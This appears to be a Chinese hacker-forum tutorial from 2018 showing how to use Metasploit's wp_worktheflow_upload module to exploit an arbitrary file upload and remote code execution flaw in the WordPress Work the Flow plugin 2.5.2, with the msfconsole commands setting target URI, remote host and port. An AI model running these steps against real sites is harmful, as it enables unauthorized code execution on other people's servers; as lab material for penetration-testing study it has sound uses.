渗透测试实战教程:如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传

zevseo
5790zevseo大版主
2018-09-11 03:00:03
5790 2018-09-11 03:00:03
此模块利用WordPress Work the Flow插件版本2.5.2中的任意PHP代码文件上传漏洞。该漏洞允许任意文件上传和远程代码执行
利用目标
使用Flow插件,版本2.5.2。
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole

描述:如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传

图片:如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传2 (1).png

如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传

现在输入  exploit use / unix / webapp / wp_ worktheflow_upload
msf exploit (wp_worktheflow_upload)>set targeturi /wordpress
msf exploit (wp_worktheflow_upload)>set rhost 192.168.0.110 (远程主机的ip)
msf exploit (wp_worktheflow_upload)>set rport 80
msf exploit (wp_worktheflow_upload)>exploit  

描述:如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传

图片:如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传4 (1).png

如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传

本文标题:渗透测试实战教程:如何利用利用WordPress Work the Flow插件的文件上传漏洞进行文件上传
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2316.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan